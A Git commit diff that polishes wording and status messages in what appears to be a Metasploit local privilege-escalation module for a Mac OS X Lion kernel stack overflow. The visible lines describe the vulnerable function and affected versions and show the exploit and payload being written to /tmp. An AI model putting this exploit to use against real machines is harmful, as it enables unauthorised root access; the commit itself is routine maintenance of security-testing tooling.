Touch up print_ statements

bug/bundler_fix
Tod Beardsley 2014-04-28 19:49:23 +01:00
parent a6edd94c7f
commit a5baea1a8e
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 4 additions and 4 deletions

View File

@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Local
'Description' => %q{
This exploit leverage a stack overflow vulnerability to escalate privileges.
The vulnerable function nfs_convert_old_nfs_args does not verify the size
of a user-provided argument before copying it to the stack. As a result by
passing a large size, a local user can overwrite the stack with arbitrary
of a user-provided argument before copying it to the stack. As a result, by
passing a large size as an argument, a local user can overwrite the stack with arbitrary
content.
Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
@ -67,11 +67,11 @@ class Metasploit3 < Msf::Exploit::Local
tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
print_status "Writing temp file... #{tmpfile}"
print_status "Writing temp file as '#{tmpfile}'"
write_file(tmpfile, exploit)
register_file_for_cleanup(tmpfile)
print_status "Writing payload file... #{payloadfile}"
print_status "Writing payload file as '#{payloadfile}'"
write_file(payloadfile, pload)
register_file_for_cleanup(payloadfile)